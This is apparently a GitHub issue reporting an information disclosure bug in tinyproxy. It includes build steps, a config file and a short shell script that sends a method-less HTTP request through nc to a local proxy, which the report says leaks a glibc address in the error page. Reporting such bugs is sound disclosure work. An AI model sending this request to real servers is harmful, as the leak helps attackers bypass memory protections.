Skip to content

Potential runtime system sensitive information disclosure through special HTTP requests. #457

New issue
New issue
Closed
Closed
Potential runtime system sensitive information disclosure through special HTTP requests.#457
@yikesoftware

Description

@yikesoftware
yikesoftware
opened on Sep 8, 2022

ubuntu 22.04
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35.

  1. Clone & Compile
git clone https://github.com/tinyproxy/tinyproxy
cd tinyproxy
./autogen.sh
./configure
make
  1. Create a config file
vi ./1.conf

Port 8888
Listen 0.0.0.0
Bind 0.0.0.0
Timeout 600
DefaultErrorFile "./default.html"
StatHost "127.0.0.1"
LogFile "./tinyproxy.log"
Syslog Off
LogLevel Info
Allow 0.0.0.0/0
ViaProxyName "tinyproxy"
  1. Add one line to original default page
cp data/templates/default.html ./
sed -i '16a\<p>Url: {url}</p>' ./default.html
  1. Start tinyproxy server
./src/tinyproxy -c ./1.conf -d
  1. Send HTTP request (Without HTTP method field)
#!/bin/bash

echo -ne                                \
" http://www.baidu.com/ HTTP/1.1\r\n    \
host: www.baidu.com\r\n                 \
User-Agent: fuck\r\n                    \
Accept: */*\r\n                         \
Proxy-Connection: Keep-Alive\r\n\r\n"   \
| nc 127.0.0.1 8888                     \
| grep -a "Url: "                       \
| hexdump -C
  1. The "URL" line in the result prints out the address of Glibc, which may be useful for attackers to launch attacks in the future.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions